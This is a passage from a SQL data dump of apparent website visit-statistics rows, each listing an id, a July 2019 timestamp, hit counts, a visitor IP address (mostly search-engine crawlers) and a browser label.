'157.55.39.172','other'),(433131,1562301636,3,3,0,0,'66.249.66.220','chrome'),(433132,1562301737,2,2,0,0,'66.249.66.218','chrome'),(433133,1562301757,1,1,0,0,'40.77.167.55','other'),(433134,1562301761,1,1,0,0,'66.249.66.130','chrome'),(433135,1562301796,1,1,0,0,'157.55.39.243','other'),(433136,1562302175,1,1,0,0,'66.249.66.128','chrome'),(433137,1562302179,1,1,0,0,'66.249.66.222','chrome'),(433138,1562302702,1,1,0,0,'35.240.92.165','other'),(433139,1562302856,1,1,0,0,'66.249.66.132','chrome'),(433140,1562303242,1,1,0,0,'213.180.203.40','other'),(433141,1562303563,1,1,0,0,'157.55.39.243','other'),(433142,1562303991,1,1,0,0,'95.108.181.75','other'),(433143,1562304290,3,3,0,0,'66.249.66.218','chrome'),(433144,1562304415,4,4,0,0,'66.249.66.220','chrome'),(433145,1562304527,1,1,0,0,'66.249.66.222','chrome'),(433146,1562304831,1,1,0,0,'87.250.224.64','other'),(433147,1562304893,1,1,0,0,'66.249.66.132','chrome'),(433148,1562304989,1,1,0,0,'185.177.151.34','other'),(433149,1562305093,1,1,0,0,'95.108.213.4','other'),(433150,1562305294,1,1,0,0,'40.77.167.55','other'),(433151,1562305471,1,1,0,0,'5.45.207.76','other'),(433152,1562305501,1,0,1,0,'66.249.66.218',''),(433153,1562305544,1,1,0,0,'66.249.66.218','chrome'),(433154,1562305891,2,2,0,0,'91.196.178.33','chrome'),(433155,1562305930,1,1,0,0,'157.55.39.172','other'),(433156,1562306467,2,2,0,0,'66.249.66.222','chrome'),(433157,1562306493,1,1,0,0,'66.249.66.218','chrome'),(433158,1562306569,1,1,0,0,'91.196.178.90','chrome'),(433159,1562306903,1,1,0,0,'66.249.66.130','chrome'),(433160,1562308492,4,4,0,0,'66.249.66.218','chrome'),(433161,1562308518,2,2,0,0,'66.249.66.130','chrome'),(433162,1562308650,1,1,0,0,'66.249.66.222','chrome'),(433163,1562308750,1,1,0,0,'91.196.178.170','chrome'),(433164,1562308855,1,1,0,0,'91.196.178.90','chrome'),(433165,1562309417,1,1,0,0,'40.77.167.37','other'),(433166,1562309624,3,3,0,0,'66.249.66.220','chrome'),(433167,1562310289,1,1,0,0,'37.9.113.20','other'),(433168,1562310385,27,27,0,0,'40.77.167.55','other'),(433169,1562310393,1,1,0,0,'66.249.66.222','chrome'),(433170,1562310458,2,2,0,0,'60.191.38.77','firefox'),(433171,1562310708,1,1,0,0,'66.249.66.132','chrome'),(433172,1562310860,2,2,0,0,'66.249.66.220','chrome'),(433173,1562310882,1,1,0,0,'66.249.66.218','chrome'),(433174,1562311067,13,13,0,0,'40.77.167.37','other'),(433175,1562311093,26,26,0,0,'157.55.39.243','other'),(433176,1562311115,15,15,0,0,'157.55.39.172','other'),(433177,1562311344,1,1,0,0,'66.249.66.222','chrome'),(433178,1562311404,1,1,0,0,'180.76.15.5','other'),(433179,1562311854,2,2,0,0,'8.29.198.27','other'),(433180,1562312767,5,5,0,0,'66.249.66.222','chrome'),(433181,1562312781,3,3,0,0,'66.249.66.218','chrome'),(433182,1562313160,1,1,0,0,'66.249.66.220','chrome'),(433183,1562313249,1,1,0,0,'91.196.178.183','chrome'),(433184,1562313404,1,1,0,0,'180.76.15.156','other'),(433185,1562314140,1,1,0,0,'91.196.178.36','other'),(433186,1562314579,1,1,0,0,'40.77.167.55','other'),(433187,1562315723,4,4,0,0,'40.77.167.37','other'),(433188,1562316014,3,3,0,0,'66.249.66.222','chrome'),(433189,1562316036,3,3,0,0,'66.249.66.218','chrome'),(433190,1562316093,3,3,0,0,'66.249.66.220','chrome'),(433191,1562316921,1,1,0,0,'40.77.167.55','other'),(433192,1562317118,1,1,0,0,'91.196.178.77','chrome'),(433193,1562317323,1,1,0,0,'40.77.167.37','other'),(433194,1562317398,1,1,0,0,'157.55.39.172','other'),(433195,1562317400,1,1,0,0,'66.249.66.222','chrome'),(433196,1562317737,1,1,0,0,'66.249.66.220','chrome'),(433197,1562318554,2,2,0,0,'66.249.66.222','chrome'),(433198,1562318560,1,1,0,0,'66.249.66.128','chrome'),(433199,1562318642,6,6,0,0,'66.249.66.218','chrome'),(433200,1562318661,1,1,0,0,'66.249.66.130','chrome'),(433201,1562320032,1,1,0,0,'40.77.167.37','other'),(433202,1562320168,1,1,0,0,'213.180.203.9','other'),(433203,1562320532,1,1,0,0,'178.154.171.27','other'),(433204,1562321065,1,1,0,0,'157.55.39.172','other'),(433205,1562321411,1,1,0,0,'40.77.167.37','other'),(433206,1562322375,1,1,0,0,'109.74.154.72','chrome'),(433207,1562322440,1,1,0,0,'40.77.167.37','other'),(433208,1562322580,3,3,0,0,'157.55.39.243','other'),(433209,1562322703,1,1,0,0,'8.29.198.26','other'),(433210,1562322873,2,2,0,0,'66.249.66.218','chrome'),(433211,1562322926,1,1,0,0,'8.29.198.27','other'),(433212,1562322977,1,1,0,0,'157.55.39.172','other'),(433213,1562323197,1,1,0,0,'66.249.66.222','chrome'),(433214,1562323313,1,1,0,0,'66.249.66.220','chrome'),(433215,1562324020,1,1,0,0,'157.55.39.172','other'),(433216,1562324164,1,1,0,0,'40.77.167.55','other'),(433217,1562324394,3,3,0,0,'66.249.66.218','chrome'),(433218,1562324396,2,2,0,0,'66.249.66.220','chrome'),(433219,1562324398,1,1,0,0,'66.249.66.132','chrome'),(433220,1562324772,1,1,0,0,'91.196.178.70','chrome'),(433221,1562324983,3,3,0,0,'157.55.39.172','other'),(433222,1562325008,1,1,0,0,'37.52.22.93','chrome'),(433223,1562325033,1,1,0,0,'141.8.183.23','other'),(433224,1562325921,1,1,0,0,'157.55.39.243','other'),(433225,1562325978,2,2,0,0,'40.77.167.37','other'),(433226,1562326097,2,2,0,0,'66.249.66.220','chrome'),(433227,1562326159,1,1,0,0,'91.196.178.70','chrome'),(433228,1562326970,2,2,0,0,'66.249.66.222','chrome'),(433229,1562327152,1,1,0,0,'66.249.66.218','chrome'),(433230,1562327172,2,2,0,0,'40.77.167.37','other'),(433231,1562327178,1,1,0,0,'40.77.167.55','other'),(433232,1562327588,1,1,0,0,'37.53.214.146','chrome'),(433233,1562327743,2,2,0,0,'157.55.39.172','other'),(433234,1562328451,3,3,0,0,'157.55.39.243','other'),(433235,1562328526,1,1,0,0,'66.249.66.222','chrome'),(433236,1562328699,2,2,0,0,'40.77.167.55','other'),(433237,1562329363,3,3,0,0,'66.249.66.220','chrome'),(433238,1562329809,2,2,0,0,'66.249.66.218','chrome'),(433239,1562329870,1,1,0,0,'66.249.66.222','chrome'),(433240,1562329913,1,1,0,0,'66.249.66.130','chrome'),(433241,1562330239,1,1,0,0,'40.77.167.55','other'),(433242,1562330588,1,1,0,0,'40.77.167.37','other'),(433243,1562330938,1,1,0,0,'157.55.39.172','other'),(433244,1562331192,1,1,0,0,'66.249.66.218','chrome'),(433245,1562331733,3,3,0,0,'66.249.66.220','chrome'),(433246,1562331994,1,1,0,0,'78.31.71.37','chrome'),(433247,1562332157,1,1,0,0,'66.249.66.128','chrome'),(433248,1562332882,1,1,0,0,'184.94.240.92','firefox'),(433249,1562332914,2,2,0,0,'5.45.207.79','other'),(433250,1562332946,2,2,0,0,'178.154.244.11','other'),(433251,1562333151,2,2,0,0,'157.55.39.243','other'),(433252,1562333197,2,2,0,0,'40.77.167.55','other'),(433253,1562333293,2,2,0,0,'66.249.66.220','chrome'),(433254,1562333335,4,4,0,0,'66.249.66.218','chrome'),(433255,1562333466,2,2,0,0,'66.249.66.128','chrome'),(433256,1562333486,2,2,0,0,'66.249.66.222','chrome'),(433257,1562333558,2,2,0,0,'8.29.198.26','other'),(433258,1562333711,1,1,0,0,'141.8.142.103','other'),(433259,1562334398,1,1,0,0,'91.196.178.79','firefox'),(433260,1562334436,3,3,0,0,'40.77.167.37','other'),(433261,1562334456,1,1,0,0,'66.249.66.196','chrome'),(433262,1562335529,3,3,0,0,'157.55.39.172','other'),(433263,1562335588,1,1,0,0,'91.196.178.175','chrome'),(433264,1562335650,1,1,0,0,'66.249.66.218','chrome'),(433265,1562335652,1,1,0,0,'66.249.66.222','chrome'),(433266,1562335659,1,1,0,0,'40.77.167.37','other'),(433267,1562335661,3,3,0,0,'66.249.66.220','chrome'),(433268,1562335698,2,2,0,0,'157.55.39.243','other'),(433269,1562335710,1,1,0,0,'40.77.167.55','other'),(433270,1562335796,1,1,0,0,'66.249.66.128','chrome'),(433271,1562335958,1,1,0,0,'94.242.54.22','chrome'),(433272,1562336424,1,1,0,0,'5.45.207.19','other'),(433273,1562336456,2,2,0,0,'178.154.244.11','other'),(433274,1562336464,1,1,0,0,'95.108.213.4','other'),(433275,1562336819,2,2,0,0,'40.77.167.55','other'),(433276,1562336887,1,1,0,0,'91.196.178.70','chrome'),(433277,1562337044,4,4,0,0,'157.55.39.243','other'),(433278,1562337511,1,1,0,0,'178.154.244.11','other'),(433279,1562337581,1,1,0,0,'40.77.167.37','other'),(433280,1562337837,1,1,0,0,'40.77.167.55','other'),(433281,1562337957,1,1,0,0,'5.45.207.19','other'),(433282,1562338063,2,2,0,0,'157.55.39.172','other'),(433283,1562338542,2,2,0,0,'157.55.39.243','other'),(433284,1562338950,1,1,0,0,'40.77.167.37','other'),(433285,1562339040,1,1,0,0,'157.55.39.172','other'),(433286,1562339993,1,1,0,0,'40.77.167.55','other'),(433287,1562340094,2,2,0,0,'40.77.167.37','other'),(433288,1562340390,2,2,0,0,'157.55.39.172','other'),(433289,1562340433,1,1,0,0,'5.45.207.79','other'),(433290,1562340957,2,2,0,0,'66.249.66.132','chrome'),(433291,1562341161,1,1,0,0,'66.249.66.220','chrome'),(433292,1562341491,2,2,0,0,'66.249.66.218','chrome'),(433293,1562341602,2,2,0,0,'157.55.39.243','other'),(433294,1562341685,1,1,0,0,'157.55.39.172','other'),(433295,1562341704,3,3,0,0,'40.77.167.37','other'),(433296,1562341718,1,1,0,0,'66.249.66.222','chrome'),(433297,1562341784,2,2,0,0,'40.77.167.55','other'),(433298,1562341843,1,1,0,0,'95.163.255.93','other'),(433299,1562341877,1,1,0,0,'66.249.66.132','chrome'),(433300,1562341885,1,1,0,0,'5.45.207.79','other'),(433301,1562341901,2,2,0,0,'178.154.244.11','other'),(433302,1562342235,1,1,0,0,'5.255.253.38','other'),(433303,1562342722,2,2,0,0,'157.55.39.172','other'),(433304,1562342757,3,3,0,0,'40.77.167.55','other'),(433305,1562343114,1,1,0,0,'157.55.39.243','other'),(433306,1562343350,3,3,0,0,'40.77.167.37','other'),(433307,1562343584,2,2,0,0,'66.249.66.220','chrome'),(433308,1562343881,1,1,0,0,'157.55.39.172','other'),(433309,1562343921,3,3,0,0,'40.77.167.55','other'),(433310,1562344425,1,1,0,0,'157.55.39.243','other'),(433311,1562344428,1,1,0,0,'8.29.198.26','other'),(433312,1562344612,1,1,0,0,'66.249.66.218','chrome'),(433313,1562344666,1,1,0,0,'8.29.198.25','other'),(433314,1562344842,1,1,0,0,'66.249.66.220','chrome'),(433315,1562344889,1,1,0,0,'40.77.167.55','other'),(433316,1562345512,1,1,0,0,'66.249.66.222','chrome'),(433317,1562345590,1,1,0,0,'157.55.39.243','other'),(433318,1562345611,1,1,0,0,'157.55.39.172','other'),(433319,1562345626,2,2,0,0,'40.77.167.37','other'),(433320,1562346326,23,23,0,0,'66.249.66.218','chrome'),(433321,1562346551,3,3,0,0,'157.55.39.243','other'),(433322,1562347181,1,1,0,0,'40.77.167.55','other'),(433323,1562347253,2,2,0,0,'66.249.66.222','chrome'),(433324,1562347574,2,2,0,0,'40.77.167.37','other'),(433325,1562348010,2,2,0,0,'157.55.39.243','other'),(433326,1562348270,1,1,0,0,'66.249.66.220','chrome'),(433327,1562348304,1,1,0,0,'40.77.167.55','other'),(433328,1562348324,1,1,0,0,'66.249.66.218','chrome'),(433329,1562348437,2,2,0,0,'66.249.66.222','chrome'),(433330,1562348668,1,1,0,0,'157.55.39.172','other'),(433331,1562348775,1,1,0,0,'40.77.167.37','other'),(433332,1562349152,1,1,0,0,'107.178.38.23','chrome'),(433333,1562349663,4,4,0,0,'66.249.66.222','chrome'),(433334,1562349751,2,2,0,0,'66.249.66.218','chrome'),(433335,1562349757,2,2,0,0,'66.249.66.220','chrome'),(433336,1562349814,3,3,0,0,'40.77.167.55','other'),(433337,1562350067,1,1,0,0,'185.154.72.12','other'),(433338,1562350283,3,3,0,0,'157.55.39.243','other'),(433339,1562350867,1,1,0,0,'178.154.244.11','other'),(433340,1562351005,1,1,0,0,'157.55.39.172','other'),(433341,1562351051,1,1,0,0,'66.249.66.222','chrome'),(433342,1562351677,3,3,0,0,'40.77.167.37','other'),(433343,1562352076,1,1,0,0,'40.77.167.55','other'),(433344,1562352079,1,1,0,0,'66.249.66.220','chrome'),(433345,1562352279,1,1,0,0,'66.249.66.218','chrome'),(433346,1562352566,1,1,0,0,'66.249.66.132','chrome'),(433347,1562353293,1,1,0,0,'157.55.39.172','other'),(433348,1562353301,1,1,0,0,'66.249.66.222','chrome'),(433349,1562353351,2,2,0,0,'40.77.167.55','other'),(433350,1562354122,2,2,0,0,'40.77.167.37','other'),(433351,1562354223,3,3,0,0,'157.55.39.243','other'),(433352,1562355215,2,2,0,0,'66.249.66.222','chrome'),(433353,1562355293,1,1,0,0,'8.29.198.26','other'),(433354,1562355444,2,2,0,0,'157.55.39.243','other'),(433355,1562355532,1,1,0,0,'8.29.198.25','other'),(433356,1562355861,1,1,0,0,'66.249.66.218','chrome'),(433357,1562355972,2,2,0,0,'40.77.167.37','other'),(433358,1562356074,1,1,0,0,'66.249.66.220','chrome'),(433359,1562356376,3,3,0,0,'40.77.167.55','other'),(433360,1562356926,1,1,0,0,'66.249.66.128','chrome'),(433361,1562357296,1,1,0,0,'66.249.66.222','chrome'),(433362,1562357302,1,1,0,0,'66.249.66.220','chrome'),(433363,1562357371,1,1,0,0,'13.66.139.0','other'),(433364,1562357447,2,2,0,0,'40.77.167.37','other'),(433365,1562357644,1,1,0,0,'66.249.66.132','chrome'),(433366,1562357754,2,2,0,0,'40.77.167.55','other'),(433367,1562358466,1,1,0,0,'157.55.39.243','other'),(433368,1562359129,6,6,0,0,'66.249.66.218','chrome'),(433369,1562359132,2,2,0,0,'66.249.66.220','chrome'),(433370,1562359167,2,2,0,0,'66.249.66.222','chrome'),(433371,1562359179,2,2,0,0,'40.77.167.55','other'),(433372,1562359270,1,1,0,0,'66.249.66.132','chrome'),(433373,1562359298,2,2,0,0,'66.249.66.128','chrome'),(433374,1562359442,2,2,0,0,'157.55.39.243','other'),(433375,1562359532,1,1,0,0,'157.55.39.192','other'),(433376,1562359977,1,1,0,0,'5.45.207.79','other'),(433377,1562360124,1,1,0,0,'178.154.244.11','other'),(433378,1562360201,3,3,0,0,'40.77.167.37','other'),(433379,1562360383,1,1,0,0,'40.77.167.55','other'),(433380,1562360760,1,1,0,0,'66.249.66.222','chrome'),(433381,1562361235,1,1,0,0,'40.77.167.37','other'),(433382,1562361267,1,1,0,0,'66.249.66.220','chrome'),(433383,1562361291,2,2,0,0,'66.249.66.218','chrome'),(433384,1562361316,1,1,0,0,'40.77.167.55','other'),(433385,1562362565,1,1,0,0,'40.77.167.55','other'),(433386,1562362744,1,1,0,0,'178.154.244.11','other'),(433387,1562362884,2,2,0,0,'40.77.167.37','other'),(433388,1562362956,4,4,0,0,'157.55.39.172','other'),(433389,1562363649,1,1,0,0,'40.77.167.55','other'),(433390,1562363672,1,1,0,0,'5.45.207.79','other'),(433391,1562364251,1,1,0,0,'66.249.66.222','chrome'),(433392,1562364383,1,1,0,0,'157.55.39.172','other'),(433393,1562364598,2,2,0,0,'66.249.66.220','chrome'),(433394,1562364687,2,2,0,0,'157.55.39.243','other'),(433395,1562365168,1,1,0,0,'40.77.167.55','other'),(433396,1562365785,2,2,0,0,'40.77.167.37','other'),(433397,1562366146,2,2,0,0,'8.29.198.26','other'),(433398,1562366357,2,2,0,0,'66.249.66.218','chrome'),(433399,1562366467,3,3,0,0,'66.249.66.222','chrome'),(433400,1562366797,2,2,0,0,'157.55.39.172','other'),(433401,1562366869,1,1,0,0,'40.77.167.37','other'),(433402,1562366987,1,1,0,0,'157.55.39.169','other'),(433403,1562367278,2,2,0,0,'40.77.167.55','other'),(433404,1562367689,2,2,0,0,'157.55.39.243','other'),(433405,1562368883,1,1,0,0,'157.55.39.172','other'),(433406,1562369080,2,2,0,0,'66.249.66.218','chrome'),(433407,1562369955,2,2,0,0,'157.55.39.243','other'),(433408,1562370469,1,1,0,0,'66.249.66.218','chrome'),(433409,1562370614,1,1,0,0,'40.77.167.55','other'),(433410,1562370716,1,1,0,0,'40.77.167.37','other'),(433411,1562371237,1,1,0,0,'178.154.244.11','other'),(433412,1562371577,1,1,0,0,'5.45.207.19','other'),(433413,1562371702,2,2,0,0,'40.77.167.55','other'),(433414,1562371742,2,2,0,0,'157.55.39.172','other'),(433415,1562372518,1,1,0,0,'66.249.66.220','chrome'),(433416,1562372631,3,3,0,0,'40.77.167.37','other'),(433417,1562372691,3,3,0,0,'40.77.167.55','other'),(433418,1562372941,1,1,0,0,'157.55.39.172','other'),(433419,1562373407,1,1,0,0,'157.55.39.243','other'),(433420,1562373472,1,1,0,0,'66.249.66.128','chrome'),(433421,1562373614,2,2,0,0,'40.77.167.37','other'),(433422,1562373659,1,1,0,0,'40.77.167.55','other'),(433423,1562373779,2,2,0,0,'66.249.66.222','chrome'),(433424,1562373929,1,1,0,0,'66.249.66.130','chrome'),(433425,1562373957,4,4,0,0,'66.249.66.220','chrome'),(433426,1562374127,1,1,0,0,'95.84.135.73','msie'),(433427,1562374279,3,3,0,0,'66.249.66.218','chrome'),(433428,1562374817,1,1,0,0,'157.55.39.172','other'),(433429,1562375110,2,2,0,0,'40.77.167.37','other'),(433430,1562376463,2,2,0,0,'40.77.167.55','other'),(433431,1562376493,2,2,0,0,'157.55.39.243','other'),(433432,1562376986,1,1,0,0,'8.29.198.26','other'),(433433,1562377069,3,3,0,0,'157.55.39.172','other'),(433434,1562377260,1,1,0,0,'8.29.198.25','other'),(433435,1562377272,1,1,0,0,'40.77.167.37','other'),(433436,1562377469,1,1,0,0,'157.55.39.243','other'),(433437,1562378137,4,4,0,0,'40.77.167.55','other'),(433438,1562378359,1,1,0,0,'66.249.66.222','chrome'),(433439,1562378567,1,1,0,0,'5.45.207.79','other'),(433440,1562378741,2,2,0,0,'66.249.66.220','chrome'),(433441,1562378846,2,2,0,0,'178.154.244.11','other'),(433442,1562379007,1,1,0,0,'5.45.207.19','other'),(433443,1562379080,1,1,0,0,'13.66.139.0','other'),(433444,1562379362,1,1,0,0,'87.250.224.47','other'),(433445,1562379415,2,2,0,0,'40.77.167.37','other'),(433446,1562379514,2,2,0,0,'157.55.39.243','other'),(433447,1562379711,3,3,0,0,'66.249.66.222','chrome'),(433448,1562380267,3,3,0,0,'66.249.66.220','chrome'),(433449,1562380480,1,1,0,0,'40.77.167.55','other'),(433450,1562380546,2,2,0,0,'157.55.39.243','other'),(433451,1562381221,2,2,0,0,'40.77.167.37','other'),(433452,1562381644,1,1,0,0,'157.55.39.172','other'),(433453,1562382075,1,1,0,0,'40.77.167.55','other'),(433454,1562382937,2,2,0,0,'66.249.66.220','chrome'),(433455,1562383561,2,2,0,0,'66.249.66.218','chrome'),(433456,1562384125,1,1,0,0,'5.45.207.79','other'),(433457,1562384985,3,3,0,0,'157.55.39.172','other'),(433458,1562385134,1,1,0,0,'40.77.167.55','other'),(433459,1562385725,1,1,0,0,'40.77.167.37','other'),(433460,1562386983,1,1,0,0,'35.189.255.234','firefox'),(433461,1562387543,1,1,0,0,'5.45.207.79','other'),(433462,1562387828,1,1,0,0,'8.29.198.27','other'),(433463,1562388106,1,1,0,0,'66.249.66.220','chrome'),(433464,1562388118,1,1,0,0,'8.29.198.26','other'),(433465,1562388237,2,2,0,0,'66.249.66.222','chrome'),(433466,1562389239,1,1,0,0,'91.196.178.73','firefox'),(433467,1562390283,1,1,0,0,'66.249.66.220','chrome'),(433468,1562390535,1,1,0,0,'157.55.39.172','other'),(433469,1562391447,1,1,0,0,'87.118.92.43','other'),(433470,1562391595,2,2,0,0,'66.249.66.220','chrome'),(433471,1562391740,3,3,0,0,'66.249.66.218','chrome'),(433472,1562391854,1,1,0,0,'157.55.39.172','other'),(433473,1562392437,1,1,0,0,'40.77.167.55','other'),(433474,1562392511,2,2,0,0,'66.249.66.220','chrome'),(433475,1562393050,1,1,0,0,'66.249.66.218','chrome'),(433476,1562393431,1,1,0,0,'66.249.66.130','chrome'),(433477,1562393464,1,1,0,0,'194.44.61.241','chrome'),(433478,1562393599,1,1,0,0,'66.249.66.220','chrome'),(433479,1562393656,1,1,0,0,'66.249.66.222','chrome'),(433480,1562393824,1,1,0,0,'37.9.113.20','other'),(433481,1562394538,1,1,0,0,'207.46.13.208','other'),(433482,1562395218,1,1,0,0,'66.249.66.220','chrome'),(433483,1562395323,3,3,0,0,'66.249.66.218','chrome'),(433484,1562395688,1,1,0,0,'178.154.244.11','other'),(433485,1562395802,1,1,0,0,'207.46.13.206','other'),(433486,1562395890,1,1,0,0,'141.8.142.108','other'),(433487,1562396133,1,1,0,0,'66.249.66.220','chrome'),(433488,1562396165,1,1,0,0,'5.45.207.80','other'),(433489,1562396765,1,1,0,0,'66.249.66.218','chrome'),(433490,1562397110,2,2,0,0,'66.249.66.220','chrome'),(433491,1562397149,1,1,0,0,'66.249.66.132','chrome'),(433492,1562397761,4,4,0,0,'207.46.13.209','other'),(433493,1562397766,5,5,0,0,'207.46.13.206','other'),(433494,1562397771,4,4,0,0,'157.55.39.64','other'),(433495,1562397890,3,3,0,0,'207.46.13.210','other'),(433496,1562398673,1,1,0,0,'8.29.198.26','other'),(433497,1562398772,4,4,0,0,'107.185.69.131','other'),(433498,1562398777,1,1,0,0,'69.4.87.74','chrome'),(433500,1562398778,1,1,0,0,'93.119.227.91','other'),(433502,1562398864,1,1,0,0,'66.249.66.220','chrome'),(433503,1562398877,1,1,0,0,'66.249.66.130','chrome'),(433504,1562398883,2,2,0,0,'66.249.66.218','chrome'),(433505,1562398896,1,1,0,0,'141.8.183.11','other'),(433506,1562398918,1,1,0,0,'141.8.142.108','other'),(433507,1562398999,1,1,0,0,'8.29.198.25','other'),(433508,1562399115,2,2,0,0,'207.46.13.210','other'),(433509,1562399336,1,1,0,0,'66.249.66.222','chrome'),(433510,1562399584,1,1,0,0,'207.46.13.206','other'),(433511,1562399752,2,2,0,0,'45.63.15.169','other'),(433512,1562400035,3,3,0,0,'66.249.66.218','chrome'),(433513,1562400458,1,1,0,0,'66.249.66.132','chrome'),(433514,1562400461,2,2,0,0,'66.249.66.128','chrome'),(433515,1562400500,1,1,0,0,'66.249.66.220','chrome'),(433516,1562400501,1,1,0,0,'66.249.66.222','chrome'),(433517,1562401380,2,2,0,0,'66.249.66.218','chrome'),(433518,1562401866,2,2,0,0,'157.55.39.64','other'),(433519,1562402011,1,1,0,0,'207.46.13.206','other'),(433520,1562402088,2,2,0,0,'66.249.66.130','chrome'),(433521,1562402174,1,1,0,0,'207.46.13.95','other'),(433522,1562402202,2,2,0,0,'66.249.66.220','chrome'),(433523,1562402304,1,1,0,0,'51.68.152.26','chrome'),(433524,1562403163,1,1,0,0,'207.46.13.95','other'),(433525,1562403918,1,1,0,0,'66.249.66.220','chrome'),(433526,1562403927,1,1,0,0,'66.249.66.218','chrome'),(433527,1562404214,1,1,0,0,'207.46.13.206','other'),(433528,1562404298,1,1,0,0,'178.154.171.27','other'),(433529,1562404718,1,1,0,0,'207.46.13.210','other'),(433530,1562406408,1,1,0,0,'207.46.13.206','other'),(433531,1562407287,1,1,0,0,'207.46.13.210','other'),(433532,1562407460,1,1,0,0,'207.46.13.206','other'),(433533,1562408238,1,1,0,0,'109.74.154.72','chrome'),(433534,1562408522,1,1,0,0,'207.46.13.210','other'),(433535,1562408535,1,1,0,0,'207.46.13.95','other'),(433536,1562408692,1,1,0,0,'54.208.102.37','other'),(433537,1562408694,1,1,0,0,'107.21.1.8','other'),(433538,1562409316,1,1,0,0,'87.250.224.118','other'),(433539,1562409319,1,1,0,0,'178.154.244.21','other'),(433540,1562409512,2,2,0,0,'8.29.198.27','other'),(433541,1562409855,1,1,0,0,'178.251.109.248','chrome'),(433542,1562410674,1,1,0,0,'157.55.39.64','other'),(433543,1562410974,1,1,0,0,'207.46.13.210','other'),(433544,1562412754,1,1,0,0,'207.46.13.95','other'),(433545,1562412892,1,1,0,0,'87.250.224.81','other'),(433546,1562413745,1,1,0,0,'207.46.13.210','other'),(433547,1562414124,1,1,0,0,'199.16.157.180','other'),(433548,1562414703,3,3,0,0,'157.55.39.64','other'),(433549,1562415022,1,1,0,0,'207.46.13.95','other'),(433550,1562416409,1,1,0,0,'207.46.13.86','other'),(433551,1562419875,2,2,0,0,'157.55.39.64','other'),(433552,1562419899,1,1,0,0,'207.46.13.86','other'),(433553,1562420374,2,2,0,0,'8.29.198.27','other'),(433554,1562420384,1,1,0,0,'94.242.54.22','chrome'),(433555,1562420530,1,1,0,0,'141.8.142.103','other'),(433556,1562420940,1,1,0,0,'87.250.224.99','other'),(433557,1562421027,1,1,0,0,'37.9.113.38','other'),(433558,1562421488,1,1,0,0,'157.55.39.84','other'),(433559,1562421765,1,1,0,0,'207.46.13.210','other'),(433560,1562421986,3,3,0,0,'157.55.39.64','other'),(433561,1562422144,1,1,0,0,'176.110.134.2','chrome'),(433562,1562422455,1,1,0,0,'78.31.71.37','chrome'),(433563,1562422727,2,2,0,0,'157.55.39.84','other'),(433564,1562422855,1,0,1,0,'66.249.66.222',''),(433565,1562422908,1,0,1,0,'66.249.66.128',''),(433566,1562423501,1,1,0,0,'180.76.15.17','other'),(433567,1562423748,1,1,0,0,'40.77.167.44','other'),(433568,1562424138,2,2,0,0,'207.46.13.56','other'),(433569,1562424157,1,1,0,0,'66.249.66.220','chrome'),(433570,1562424682,1,1,0,0,'89.178.233.231','msie'),(433571,1562425017,2,2,0,0,'207.46.13.210','other'),(433572,1562426055,1,1,0,0,'207.46.13.50','other'),(433573,1562426397,1,1,0,0,'207.46.13.210','other'),(433574,1562426789,1,1,0,0,'5.45.207.79','other'),(433575,1562427063,2,2,0,0,'40.77.167.44','other'),(433576,1562427501,1,1,0,0,'180.76.15.136','other'),(433577,1562427994,1,1,0,0,'207.46.13.210','other'),(433578,1562428163,1,1,0,0,'40.77.167.44','other'),(433579,1562428232,1,1,0,0,'207.46.13.50','other'),(433580,1562428763,1,1,0,0,'207.46.13.82','other'),(433581,1562429078,1,1,0,0,'207.46.13.210','other'),(433582,1562429391,2,2,0,0,'207.46.13.50','other'),(433583,1562429461,1,1,0,0,'5.45.207.19','other'),(433584,1562429509,1,1,0,0,'178.154.244.11','other'),(433585,1562430223,1,1,0,0,'40.77.167.44','other'),(433586,1562430229,1,1,0,0,'66.249.66.222','chrome'),(433587,1562430273,1,1,0,0,'66.249.66.218','chrome'),(433588,1562431241,1,1,0,0,'8.29.198.26','other'),(433589,1562431593,1,1,0,0,'8.29.198.25','other'),(433590,1562431683,1,1,0,0,'40.77.167.44','other'),(433591,1562432072,1,1,0,0,'141.8.142.162','other'),(433592,1562432077,2,2,0,0,'5.45.207.79','other'),(433593,1562432233,1,1,0,0,'5.45.207.19','other'),(433594,1562432586,1,1,0,0,'40.77.167.44','other'),(433595,1562432937,1,1,0,0,'77.111.244.239','chrome'),(433596,1562432962,1,1,0,0,'178.154.244.11','other'),(433597,1562432980,1,1,0,0,'77.111.244.156','chrome'),(433598,1562433490,2,2,0,0,'207.46.13.243','other'),(433599,1562434432,2,2,0,0,'66.249.66.222','chrome'),(433600,1562434515,1,1,0,0,'207.46.13.50','other'),(433601,1562434569,1,1,0,0,'5.45.207.19','other'),(433602,1562434588,2,2,0,0,'207.46.13.96','other'),(433603,1562434695,1,1,0,0,'178.154.244.11','other'),(433604,1562434782,1,1,0,0,'207.46.13.243','other'),(433605,1562434854,1,1,0,0,'109.173.85.172','chrome'),(433606,1562435051,1,1,0,0,'207.46.13.24','other'),(433607,1562435477,2,2,0,0,'207.46.13.50','other'),(433608,1562436081,1,1,0,0,'207.46.13.24','other'),(433609,1562436334,2,2,0,0,'66.249.66.220','chrome'),(433610,1562436573,3,3,0,0,'207.46.13.50','other'),(433611,1562436744,2,2,0,0,'66.249.66.218','chrome'),(433612,1562437262,1,1,0,0,'207.46.13.243','other'),(433613,1562437600,1,1,0,0,'178.154.244.11','other'),(433614,1562437714,1,1,0,0,'66.249.66.218','chrome'),(433615,1562437899,1,1,0,0,'207.46.13.96','other'),(433616,1562438115,1,1,0,0,'207.46.13.146','other'),(433617,1562438195,2,2,0,0,'40.77.167.105','other'),(433618,1562438263,1,1,0,0,'66.249.66.220','chrome'),(433619,1562439194,2,2,0,0,'66.249.66.220','chrome'),(433620,1562439315,1,1,0,0,'40.77.167.105','other'),(433621,1562439365,1,1,0,0,'207.46.13.146','other'),(433622,1562439386,2,2,0,0,'66.249.66.218','chrome'),(433623,1562439519,3,3,0,0,'207.46.13.96','other'),(433624,1562439937,1,1,0,0,'178.154.244.11','other'),(433625,1562439969,1,1,0,0,'207.46.13.50','other'),(433626,1562440573,1,1,0,0,'207.46.13.96','other'),(433627,1562440980,1,1,0,0,'178.154.244.11','other'),(433628,1562441022,2,2,0,0,'40.77.167.105','other'),(433629,1562441112,1,1,0,0,'207.46.13.50','other'),(433630,1562441290,1,1,0,0,'207.46.13.146','other'),(433631,1562441922,1,1,0,0,'207.46.13.96','other'),(433632,1562442091,2,2,0,0,'8.29.198.27','other'),(433633,1562443245,1,1,0,0,'207.46.13.50','other'),(433634,1562443536,2,2,0,0,'40.77.167.105','other'),(433635,1562443723,1,1,0,0,'5.45.207.19','other'),(433636,1562444396,2,2,0,0,'69.4.89.106'